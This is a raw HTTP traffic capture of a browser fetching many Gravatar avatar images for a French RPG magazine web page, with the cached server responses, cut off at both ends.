Last-Modified: Mon, 02 Feb 2009 18:23:54 GMT
Etag: &quot;1838300-16aa-461f3a8378280&quot;
Accept-Ranges: bytes
Content-Length: 5802
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /avatar/9d039f583303356802f1036ed2d693f2?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/9d039f583303356802f1036ed2d693f2?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460272879
Content-Length: 4075
GET /avatar/3c55a63b3838b53877a2781e5e28bd87?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/3c55a63b3838b53877a2781e5e28bd87?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237774
Content-Length: 5842
GET /avatar/afd5dd32e7d8e51766699504efbf002b?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/afd5dd32e7d8e51766699504efbf002b?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099490
Content-Length: 3555
GET /avatar/6512b87efc142c94564904c31fea1598?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/6512b87efc142c94564904c31fea1598?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237778
Content-Length: 5556
GET /avatar/c1dafe17a7d15b9f1f4ca04cf90ed620?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/c1dafe17a7d15b9f1f4ca04cf90ed620?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718447
Content-Length: 3476
GET /avatar/c26bf9bb36cef97ab0df16473d281c15?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/c26bf9bb36cef97ab0df16473d281c15?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995934
Content-Length: 5362
GET /avatar/3eb8e9fe7c34613fe1b6c47a5cb31d87?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/3eb8e9fe7c34613fe1b6c47a5cb31d87?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E9)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995875
Content-Length: 4771
GET /avatar/86b8799cb33761096588215f3964ac44?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/86b8799cb33761096588215f3964ac44?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FD)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 934422314
Content-Length: 4824
GET /avatar/fcd546373018c457143d7e770218ffcc?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/fcd546373018c457143d7e770218ffcc?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F8)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163419
Content-Length: 3346
GET /avatar/dead611f84bf368319c29f4f87e44e6e?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/dead611f84bf368319c29f4f87e44e6e?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718473
Content-Length: 4340
GET /avatar/54da6292322734e5c920f03e0eac62ce?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/54da6292322734e5c920f03e0eac62ce?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1824001865
Content-Length: 4252
GET /avatar/d001c7050555c8fb58b7140ff07a2a1d?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/d001c7050555c8fb58b7140ff07a2a1d?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331728
Content-Length: 4837
GET /avatar/d6be0ba7251d2ba9ef1fda5651fbe168?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/d6be0ba7251d2ba9ef1fda5651fbe168?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163418
Content-Length: 5810
GET /avatar/791bbc39831b8d8f54c172e2b23aa986?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/791bbc39831b8d8f54c172e2b23aa986?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EF)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099521
Content-Length: 6735
GET /avatar/d62f50ec2dfee5acc4d6149eedb925c8?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/d62f50ec2dfee5acc4d6149eedb925c8?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/467E)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718481
Content-Length: 5454
GET /avatar/354a8ca8f27fbbd9237bd82019579eee?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/354a8ca8f27fbbd9237bd82019579eee?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460272941
Content-Length: 4961
GET /avatar/b7c1436cdaf2ed928bae4f925de456ce?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b7c1436cdaf2ed928bae4f925de456ce?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718492
Content-Length: 4991
GET /avatar/833e4d755b597db5a2779f6fae3481fa?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/833e4d755b597db5a2779f6fae3481fa?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E6)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331751
Content-Length: 6728
GET /avatar/0cc3011ca54dd3c886519e31900225fc?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/0cc3011ca54dd3c886519e31900225fc?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E6)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331754
Content-Length: 5313
GET /avatar/3dda9bfe76c0bab87473cde2deb61303?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/3dda9bfe76c0bab87473cde2deb61303?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 679085059
Content-Length: 2928
GET /avatar/b6d8c6099c21a5f5d80344ed0d0311f7?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b6d8c6099c21a5f5d80344ed0d0311f7?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119290
Content-Length: 4574
GET /avatar/614aa408315d4da17c83f109fe3c0fe7?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/614aa408315d4da17c83f109fe3c0fe7?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4667)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826818109
Content-Length: 3967
GET /avatar/e5d9144d5ed5865bc0b3ad5f50e93ea6?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/e5d9144d5ed5865bc0b3ad5f50e93ea6?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 679085073
Content-Length: 5053
GET /avatar/2f75b10bcd40f34263de5cd58d70cf89?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/2f75b10bcd40f34263de5cd58d70cf89?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237876
Content-Length: 3042
GET /avatar/743de3063229f65b1543276bb2479b5b?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/743de3063229f65b1543276bb2479b5b?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237880
Content-Length: 5781
GET /avatar/f1dea56f2f44c3e4a2090a43fc3a9177?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/f1dea56f2f44c3e4a2090a43fc3a9177?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099572
Content-Length: 4652
GET /avatar/14b25500ed4e0b7f545a13e0b78c751f?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/14b25500ed4e0b7f545a13e0b78c751f?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
